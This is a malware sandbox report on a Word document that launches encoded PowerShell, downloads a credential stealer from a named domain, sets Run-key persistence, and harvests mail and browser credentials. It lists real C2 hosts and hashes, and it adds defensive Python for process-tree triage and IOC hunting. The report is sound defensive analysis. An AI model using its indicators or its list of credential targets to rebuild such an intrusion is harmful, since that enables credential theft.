VMRay Analyzer Report for Sample #17571
VMRay Analyzer 2.2.0

Sample and analysis metadata
  Sample-ID #17571, Job-ID #2329, Submission-ID #17597
  Submitted file: C:\Users\ATVeyDl98Z\Desktop\49343.doc (doc), opened by winword.exe (Process 1)
    MD5    890ce730a3cf43f43039f114744df924
    SHA1   19142bb0a5cdb0a7ad3520d1693ef5f3761d6d9a
    SHA256 d9c9e1fece032140a4754096b08a4eb147598a36f8b582c796b8764ff6cd9a91
  Analyzed by VMRay Analyzer 2.2.0 on a Windows 7 system; VTI Database Version 2.6
  VTI Score: 0 as exported. The individual rule matches below score up to 4/5, so this field did not survive the export intact; rely on the per-rule scores.
  Analysis environment (Job-ID #2329): Timeout False; x86 32-bit PAE; VM image win7_32_sp1-mso2016; Windows 7 6.1.7601.17514 (684da42a-30cc-450f-81c5-35b4d18944b1); 156.516 (no unit preserved; presumably the analysis duration in seconds)

Process tree
  The export lists, per process, only the operation types (Created, Opened, Deleted, Moved, Read_From, Connected_To, Modified_Properties_Of) without their targets. Those counts are summarised here; the targets are in the artefact sections below.

  Process 1   PID 2552  parent 1524   winword.exe
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"
    image c:\program files\microsoft office\root\office16\winword.exe, working directory C:\Users\ATVeyDl98Z\Desktop\
    Opens 49343.doc; creates Process 2.
  Process 2   PID 2772  parent 2552   powershell.exe
    powershell -e <encoded payload not preserved in this export>
    image c:\windows\system32\windowspowershell\v1.0\powershell.exe, working directory C:\Users\ATVeyDl98Z\Desktop\
    Many file creates and handle opens (host start-up files, below), one read, three outbound connections (kerineal.com, below); creates Process 3.
  Process 3   PID 2912  parent 2772   38763.exe
    "C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe"
    image c:\users\atveyd~1\appdata\local\temp\38763.exe, working directory C:\Users\ATVeyDl98Z\Desktop\
    The executable PowerShell dropped into the user's Temp directory; creates Process 4, a second instance of itself.
  Process 4   PID 2932  parent 2912   38763.exe (second instance, same command line and image)
    File creates, one delete and one move: relocates its own image to C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe (identical hashes, below); creates Process 5.
  Process 5   PID 2956  parent 2932   viewcom.exe
    "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe"
    image c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, working directory C:\Users\ATVeyDl98Z\Desktop\
    Creates Process 6, a second instance of itself.
  Process 6   PID 2968  parent 2956   viewcom.exe (second instance, same command line and image)
    File creates, two Modified_Properties_Of, four outbound connections (65.99.230.27 and 185.82.23.28 on port 443, below); creates Processes 8, 9 and 10.
  Process 7   PID 988   parent 468    svchost.exe
    C:\Windows\system32\svchost.exe -k LocalService, working directory C:\Windows\system32\
  Process 8   PID 3184  parent 2968   viewcom.exe
    "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp"
    File creates and many handle opens; the export lists the mail-client artefacts (below) together with 9F1B.tmp.
  Process 9   PID 3192  parent 2968   viewcom.exe
    "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp"
    File creates and handle opens; the export lists the browser artefacts (below) together with 9F1C.tmp.
  Process 10  PID 3200  parent 2968   viewcom.exe
    "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp"
    Four handle opens.
  Process 11  PID 1068  parent 468    svchost.exe
    C:\Windows\system32\svchost.exe -k NetworkService, working directory C:\Windows\system32\

  The chain to recognise: a document opens PowerShell with an encoded command, PowerShell fetches and drops an executable into Temp, each stage launches a second copy of its own image before the next stage starts (3 -> 4, 5 -> 6), the same binary is moved from Temp into AppData\Local\Microsoft\Windows under a new name, and the final stage is invoked once per export file with /scomma, the CSV-export switch of the NirSoft command-line utilities.

Malware artefacts

Stage 1: powershell.exe (Process 2)
  Files read (PowerShell host start-up; not specific to this sample)
    CONOUT$
    c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
    c:\windows\system32\windowspowershell\v1.0\types.ps1xml
    c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
    c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
    c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
    c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
    c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
    c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
    c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
    c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
    c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
    c:\windows\microsoft.net\framework\v2.0.50727\config\machine.config
    STD_INPUT_HANDLE
  File written
    c:\users\atveydl98z\appdata\local\temp\38763.exe (exe)
      MD5    1b1e6729790854252dfba6c77f198a4e
      SHA1   327c94b435802f77d12913956b28c70d00ab2de5
      SHA256 3939227998b7986b481eb9bc1a10dd1c5c02fc7ff9edbd25ad86a61307186d98
  Mutex
    Global\.net clr networking (created four times; this mutex belongs to the .NET CLR Networking performance counters, whose registry keys are read alongside it, and is not sample-specific)
  Registry (all reads; HKLM unless noted)
    Software\Microsoft\PowerShell, Software\Microsoft\PowerShell\1, Software\Microsoft\PowerShell\1\PowerShellEngine (ApplicationBase, read several times)
    System\CurrentControlSet\Control\Session Manager\Environment (PSMODULEPATH); HKCU\Environment (PSMODULEPATH)
    SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell (path); SOFTWARE\Microsoft\PowerShell\1\ShellIds (PipelineMaxStackSizeMB, twice)
    SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN (StackVersion, twice)
    SYSTEM\CurrentControlSet\Services\EventLog and its sources Application, HardwareEvents, Internet Explorer, Key Management Service, Media Center, OAlerts, Security, System and Windows PowerShell; on the first pass a \PowerShell subkey is probed under each source, and the source list is then enumerated three more times (the host locating its event-log source)
    Software\Microsoft\Windows NT\CurrentVersion (InstallationType)
    SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance (Library, IsMultiInstance, First Counter, CategoryOptions, FileMappingSize, Counter Names)
    HKCU root; HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections; SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections; SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings (proxy configuration, read before the download)
  Network
    DNS   kerineal.com -> 184.168.152.148
    TCP   184.168.152.148:80, classified as HTTP
    URI   kerineal.com/simplyelegant/hQoBm/
  Apart from the dropped executable and the kerineal.com download, everything in this stage is ordinary PowerShell host behaviour. A detection for this stage should key on the Office parent, the -e argument, the outbound HTTP request and the executable written to Temp, not on the registry or .ps1xml reads.

Stage 2: 38763.exe (Processes 3 and 4), in export order
  File probes   c:\email.doc (doc), c:\a\foobar.bmp (bmp); no hashes recorded, so these paths were looked up rather than written, and neither exists on a normal workstation
  Mutex         MF6003E70
  File probes   c:\email.doc, c:\a\foobar.bmp (second pass)
  Moved_From    c:\users\atveyd~1\appdata\local\temp\38763.exe
  Moved_To      c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe (exe)
                  MD5 1b1e6729790854252dfba6c77f198a4e, SHA1 327c94b435802f77d12913956b28c70d00ab2de5, SHA256 3939227998b7986b481eb9bc1a10dd1c5c02fc7ff9edbd25ad86a61307186d98 (the same file as 38763.exe)
  Stream        c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe:zone.identifier, the mark-of-the-web stream on the relocated binary (the export does not say whether it was read or removed)
  Mutexes       Global\I40F77A1B, Global\M40F77A1B

Stage 3: viewcom.exe (Processes 5 and 6), in export order
  File probes   c:\email.doc, c:\a\foobar.bmp
  Mutex         M68B1B0D0
  File probes   c:\email.doc, c:\a\foobar.bmp (second pass)
  File          c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe
  Files created
    c:\programdata\9f1c.tmp
    c:\programdata\9f1b.tmp
    c:\programdata\9f2d.tmp
    All three carry MD5 d41d8cd98f00b204e9800998ecf8427e, SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709, SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, which are the digests of a zero-byte file. The exports were empty when hashed, either because the analysis VM held no stored credentials to export or because the files were captured before anything was written to them. Do not treat these hashes as indicators.
  Persistence (the value is written twice)
    HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      viewcom = "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" (REG_SZ)
  Network
    65.99.230.27:443    classified as HTTP
    185.82.23.28:443    classified as HTTP
    URIs 65.99.230.27 and 185.82.23.28 (no path recorded)
    Both connections are plain HTTP on port 443, not TLS. Endpoint telemetry sees only the port; a proxy or IDS that checks the protocol against the port will catch the mismatch.

Stage 4: credential and data harvesting (Processes 8, 9 and 10)
  Mail clients (export target C:\ProgramData\9F1B.tmp)
    Files
      c:\users\atveydl98z\appdata\local\microsoft\windows mail\account{81ff0b87-dbd4-46a5-a9ff-ef000b2f9024}.oeaccount
      c:\users\atveydl98z\appdata\local\microsoft\windows mail\account{a9b27062-9101-460a-98c0-c2aa26b0f943}.oeaccount
      c:\users\atveydl98z\appdata\local\microsoft\windows mail\account{d08688db-6514-4dc0-9d54-33d56d2ef97e}.oeaccount
      c:\programdata\9f1b.tmp
    Registry
      HKCU\Software\Qualcomm\Eudora\CommandLine; HKLM\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current
      HKLM\Software\Mozilla\Mozilla Thunderbird
      HKCU\Software\Google\Google Talk\Accounts; HKCU\Software\Google\Google Desktop\Mailboxes
      HKCU\Software\Microsoft\Internet Account Manager\Accounts
      HKCU\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
      HKCU\Identities; HKCU\Identities\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9} (Username) and, beneath it, Software\Microsoft\Internet Account Manager\Accounts and Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
      HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
      HKCU\Software\Microsoft\Office\15.0\Outlook\Profiles
      HKCU\Software\Microsoft\Office\16.0\Outlook\Profiles and Profiles\Outlook with the subkeys 0a0d020000000000c000000000000046, 13dbb0c8aa05101a9bb000aa002fc45a, 21c3340121c69b4d9839e87233c43775, 3517490d76624c419a828607e2a54604, 5820efc9fdbb5f47849ddf6d61a8efbf, 5822179f3ba9dd4b834ca5b688df58ee, 5cf6dc56389a514da4af66e8d249d682, 79245ba6aebb494e8474990b23b0b5d9, 822186790bcca847a772607001697335, 8503020000000000c000000000000046, 9207f3e0a3b11019908b08002b2a56c2, 9375CFF0413111d3B88A00104B2A6676, b76d3b10d1949342bbbb36b682c4ceca, f86ed2903a4a11cfb57e524153480001
        9375CFF0413111d3B88A00104B2A6676\00000001 and \00000003: values POP3 User, IMAP User, HTTP User, SMTP User
        9375CFF0413111d3B88A00104B2A6676\00000002: values POP3 User, POP3 Server, Display Name, Email, SMTP Server, SMTP Port, POP3 Port, POP3 Use SPA, POP3 Password, IMAP User, HTTP User, SMTP User
      HKCU\Software\IncrediMail\Identities; HKLM\Software\IncrediMail\Identities
      HKLM\Software\Group Mail
      HKCU\Software\Microsoft\MSNMessenger; HKCU\Software\Microsoft\MessengerService
      HKCU\Software\Yahoo\Pager
      HKCU\Software\Microsoft\IdentityCRL
      HKCU\Software\Microsoft\Windows Live Mail
  Browsers (export target C:\ProgramData\9F1C.tmp)
    Files
      c:\users\atveydl98z\appdata\local\microsoft\windows\history\history.ie5\index.dat
      c:\users\atveydl98z\appdata\local\microsoft\windows\history\history.ie5\mshist012017083120170901\index.dat
      c:\users\atveydl98z\appdata\local\microsoft\windows\history\low\history.ie5\index.dat
      c:\users\atveydl98z\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017070520170706\index.dat
      c:\users\atveydl98z\appdata\roaming\mozilla\firefox\profiles\zcf30c9i.default\places.sqlite
      c:\users\atveydl98z\appdata\local\google\chrome\user data\default\web data
      c:\users\atveydl98z\appdata\local\google\chrome\user data\default\login data
      c:\programdata\9f1c.tmp
    Registry
      HKCU\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 (Internet Explorer stored form data and passwords)
      HKLM\SOFTWARE\Mozilla; HKLM\SOFTWARE\Mozilla\Mozilla Firefox\bin; HKLM\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin (PathToExe, read three times)
      HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe
    Handles   STD_INPUT_HANDLE, STD_OUTPUT_HANDLE, STD_ERROR_HANDLE
  Read at the end of the export
    HKLM\Software\Clients\Mail\Microsoft Outlook (DLLPathEx, MSIApplicationLCID)

VTI rule matches (category, score, rule, detail, technique)
  Device                4/5  vmray_hook_keyboard_by_keystate_api       Read the current state of "VK_CANCEL" by API                                                                                          Monitor keyboard input
  Process               4/5  vmray_document_create_process             Create process "powershell -e <encoded payload not preserved in this export>"                                                          Create process
  Process               1/5  vmray_install_ipc_endpoint                Create mutex with name "Global\.net clr networking"                                                                                    Create system object
  Network               3/5  vmray_request_dns_by_name                 Resolve host name "kerineal.com"                                                                                                       Perform DNS request
  Process               4/5  vmray_document_create_process             Create process "C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe"                                                                       Create process
  Anti Analysis         4/5  vmray_detect_debugger_by_api              Check via API "IsDebuggerPresent"                                                                                                      Try to detect debugger
  Process               1/5  vmray_install_ipc_endpoint                Create mutex with name "MF6003E70"                                                                                                     Create system object
  Process               1/5  vmray_install_ipc_endpoint                Create mutex with name "Global\I40F77A1B"                                                                                              Create system object
  Process               1/5  vmray_install_ipc_endpoint                Create mutex with name "Global\M40F77A1B"                                                                                              Create system object
  Process               4/5  vmray_document_create_process             Create process "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe"                                                      Create process
  Process               1/5  vmray_install_ipc_endpoint                Create mutex with name "M68B1B0D0"                                                                                                     Create system object
  Persistence           3/5  vmray_install_startup_script_by_registry  Add "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" to Windows startup via registry                                 Install system startup script or application
  Process               4/5  vmray_document_create_process             Create process "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp"                    Create process
  Process               4/5  vmray_document_create_process             Create process "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp"                    Create process
  Process               4/5  vmray_document_create_process             Create process "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp"                            Create process
  Browser               3/5  vmray_read_browser_history                Read the browsing history for "Microsoft Internet Explorer"                                                                            Read data related to browsing history
  Browser               3/5  vmray_read_browser_credentials            Read saved credentials for "Google Chrome"                                                                                             Read data related to saved browser credentials
  Information Stealing  4/5  vmray_readout_browser_credentials         Possibly trying to read out browser credentials                                                                                        Read browser data
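The process tree is the part of this report a responder acts on first. The following Python is an added example and is not part of the VMRay report or of VMRay's tooling: it rebuilds the tree from the PIDs, parent PIDs, images and command lines listed in the report (copied into a constructed table) and applies the heuristics this chain trips: an Office process spawning a script host with an encoded command, an executable running from a user-writable path, a process re-launching its own image, and the /scomma CSV-export switch of the NirSoft command-line utilities. The report does not preserve the encoded payload, so the table carries a harmless constructed placeholder in its place; decode_encoded_command() performs the base64 and UTF-16LE decoding that powershell.exe itself applies to -EncodedCommand, which is what an analyst runs on the real blob when it is available.

```python
"""Process-tree triage for the chain in the report above.

Added example, not part of the VMRay report or of VMRay's tooling. PROCESSES
is constructed from the PIDs, parents, images and command lines in the report;
the real "-e" payload is not preserved there, so a harmless placeholder is
encoded in its place.
"""
import base64
import re
from collections import defaultdict

# Stand-in for the removed payload, built the way powershell.exe expects
# -EncodedCommand input: UTF-16LE text, then base64 (constructed, not the real one).
PLACEHOLDER_B64 = base64.b64encode(
    "Write-Output 'constructed placeholder'".encode("utf-16-le")).decode()

# (pid, ppid, image, command line); values copied from the report's process list.
PROCESSES = [
    (2552, 1524, r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE",
     r'"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"'),
    (2772, 2552, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     f"powershell -e {PLACEHOLDER_B64}"),
    (2912, 2772, r"C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe",
     r'"C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe"'),
    (2932, 2912, r"C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe",
     r'"C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe"'),
    (2956, 2932, r"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe",
     r'"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe"'),
    (2968, 2956, r"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe",
     r'"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe"'),
    (3184, 2968, r"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe",
     r'"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp"'),
    (3192, 2968, r"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe",
     r'"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp"'),
    (3200, 2968, r"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe",
     r'"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp"'),
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\local\\microsoft\\windows\\", "\\appdata\\roaming\\")
# powershell.exe accepts several abbreviations of -EncodedCommand; these are the common spellings.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Decoded -EncodedCommand script, or None if the flag is absent or the blob is not valid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def build_tree(records):
    """Return (pid -> (ppid, image, cmdline), ppid -> [child pids])."""
    by_pid = {pid: (ppid, img, cmd) for pid, ppid, img, cmd in records}
    children = defaultdict(list)
    for pid, ppid, _, _ in records:
        children[ppid].append(pid)
    return by_pid, children


def ancestry(by_pid, pid):
    """Image names from pid upward until a parent outside the table is reached."""
    chain = []
    while pid in by_pid:
        ppid, img, _ = by_pid[pid]
        chain.append(image_name(img))
        pid = ppid
    return chain


def triage(records):
    """Sorted (pid, finding) pairs; one pid may carry several findings."""
    by_pid, _ = build_tree(records)
    findings = []
    for pid, ppid, img, cmd in records:
        name = image_name(img)
        parent = image_name(by_pid[ppid][1]) if ppid in by_pid else None
        if parent in OFFICE and name in SCRIPT_HOSTS:
            findings.append((pid, f"office-child:{parent}->{name}"))
        if name == "powershell.exe" and decode_encoded_command(cmd) is not None:
            findings.append((pid, "encoded-command"))
        if any(s in img.lower() for s in USER_WRITABLE):
            findings.append((pid, "user-writable-image-path"))
        if parent == name:  # a stage launching a second copy of its own image
            findings.append((pid, "self-relaunch"))
        if re.search(r"(?i)\s/scomma\s", cmd):  # /scomma is the NirSoft CSV-export switch
            findings.append((pid, "nirsoft-style-export-switch"))
        if parent not in OFFICE and any(a in OFFICE for a in ancestry(by_pid, pid)[1:]):
            findings.append((pid, "descends-from-office"))
    return sorted(findings)


if __name__ == "__main__":
    for pid, finding in triage(PROCESSES):
        print(pid, finding)
```

The findings are deliberately coarse: the "office-child" and "encoded-command" pair on PID 2772 is the high-confidence alert, while "self-relaunch" and "user-writable-image-path" on their own are common in legitimate installers and should raise priority rather than fire alone. When the real encoded blob is available, feed the full command line to decode_encoded_command() and extract URLs and paths from the result; the placeholder here decodes to a harmless string.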
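The artefact sections above hold everything needed for a host and network hunt: the file hashes, the domain and IP addresses, the Run value, the Zone.Identifier stream and the export files in ProgramData. The following Python is an added example, not part of the VMRay report: it collects those values into an IOC set and runs them over a constructed list of Sysmon-shaped events (event IDs 1, 3, 11, 13, 15 and 22 with Sysmon's field names; the records themselves are invented for the example, including two benign controls). It also carries two caveats from the report into the hunt. First, all three .tmp export files have the digests of the zero-byte file, so is_empty_file_hash() keeps those values out of the IOC set rather than letting them match every empty file on the estate. Second, the viewcom.exe connections are plain HTTP on port 443; endpoint telemetry only shows the port, so the example flags port-443 connections from a user-writable image and leaves the protocol mismatch to proxy or IDS logs.

```python
"""IOC set from the report above, matched against Sysmon-shaped events.

Added example, not part of the VMRay report. IOC values are copied from the
report; EVENTS is a constructed list shaped like Sysmon events (IDs 1, 3, 11,
13, 15, 22) and is not a real log.
"""
import hashlib

IOCS = {
    "sha256": {
        "3939227998b7986b481eb9bc1a10dd1c5c02fc7ff9edbd25ad86a61307186d98",  # 38763.exe / viewcom.exe
        "d9c9e1fece032140a4754096b08a4eb147598a36f8b582c796b8764ff6cd9a91",  # 49343.doc
    },
    "domains": {"kerineal.com"},
    "ips": {"184.168.152.148", "65.99.230.27", "185.82.23.28"},
    "run_value": "viewcom",
}

# Digests of the zero-byte file; the report's 9F1B/9F1C/9F2D.tmp all carry these.
EMPTY_HASHES = {h(b"").hexdigest() for h in (hashlib.md5, hashlib.sha1, hashlib.sha256)}


def is_empty_file_hash(digest):
    """True for the MD5/SHA1/SHA256 of an empty file; never use such a value as an IOC."""
    return digest.lower() in EMPTY_HASHES


def parse_hashes(field):
    """Sysmon 'MD5=..,SHA256=..' field -> {'MD5': '..', 'SHA256': '..'} with lowercase digests."""
    return {a.strip().upper(): v.strip().lower()
            for a, v in (p.split("=", 1) for p in field.split(",") if "=" in p)}


def user_writable(path):
    p = path.lower()
    return any(s in p for s in ("\\appdata\\", "\\users\\public\\", "\\programdata\\"))


def match_event(ev):
    """Reasons this one event is interesting; empty list if none."""
    reasons, eid = [], ev["EventID"]
    img = ev.get("Image", "")
    if eid == 1:  # ProcessCreate
        if parse_hashes(ev.get("Hashes", "")).get("SHA256") in IOCS["sha256"]:
            reasons.append("known-bad-hash")
        if user_writable(img) and ev.get("ParentImage", "").lower().endswith("\\powershell.exe"):
            reasons.append("powershell-dropped-exe")
    elif eid == 3:  # NetworkConnect
        if ev.get("DestinationIp") in IOCS["ips"]:
            reasons.append("c2-ip")
        if ev.get("DestinationPort") == 443 and user_writable(img):
            reasons.append("443-from-user-writable-image")
    elif eid == 11:  # FileCreate
        t = ev.get("TargetFilename", "").lower()
        if t.startswith("c:\\programdata\\") and t.endswith(".tmp") and user_writable(img):
            reasons.append("tmp-export-in-programdata")
    elif eid == 13:  # RegistryEvent, value set
        tgt = ev.get("TargetObject", "")
        if "\\currentversion\\run\\" in tgt.lower():
            reasons.append("run-key-set")
            if user_writable(ev.get("Details", "")):
                reasons.append("run-key-to-user-writable-path")
            if tgt.rsplit("\\", 1)[-1].lower() == IOCS["run_value"]:
                reasons.append("known-run-value-name")
    elif eid == 15:  # FileCreateStreamHash, alternate data stream written
        if ev.get("TargetFilename", "").lower().endswith(":zone.identifier") and user_writable(img):
            reasons.append("zone-identifier-on-user-writable-exe")
    elif eid == 22:  # DnsQuery
        if ev.get("QueryName", "").lower() in IOCS["domains"]:
            reasons.append("c2-domain")
    return reasons


def scan(events):
    """(RecordId, reason) pairs for every matching event."""
    return [(ev["RecordId"], r) for ev in events for r in match_event(ev)]


# Constructed Sysmon-shaped events (not a real log): six drawn from the report, two benign controls.
VIEWCOM = r"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"RecordId": 1, "EventID": 1, "Image": r"C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe", "ParentImage": POWERSHELL,
     "Hashes": "MD5=1B1E6729790854252DFBA6C77F198A4E,SHA256=3939227998B7986B481EB9BC1A10DD1C5C02FC7FF9EDBD25AD86A61307186D98"},
    {"RecordId": 2, "EventID": 22, "Image": POWERSHELL, "QueryName": "kerineal.com"},
    {"RecordId": 3, "EventID": 3, "Image": VIEWCOM, "DestinationIp": "65.99.230.27", "DestinationPort": 443},
    {"RecordId": 4, "EventID": 13, "Image": VIEWCOM, "Details": f'"{VIEWCOM}"',
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Run\viewcom"},
    {"RecordId": 5, "EventID": 15, "Image": r"C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe",
     "TargetFilename": VIEWCOM + ":Zone.Identifier"},
    {"RecordId": 6, "EventID": 11, "Image": VIEWCOM, "TargetFilename": r"C:\ProgramData\9F1B.tmp"},
    {"RecordId": 7, "EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "Hashes": "SHA256=" + "00" * 32},  # benign control
    {"RecordId": 8, "EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "192.0.2.10", "DestinationPort": 443},  # benign control
]
```

The hash and domain matches are exact and safe to alert on; the behavioural reasons (Run value pointing into AppData, a Zone.Identifier stream written on a user-writable executable, .tmp files in ProgramData from an AppData process) are weaker individually and are most useful when several land on the same host within a short window, which is exactly what the report shows for Processes 4 to 10.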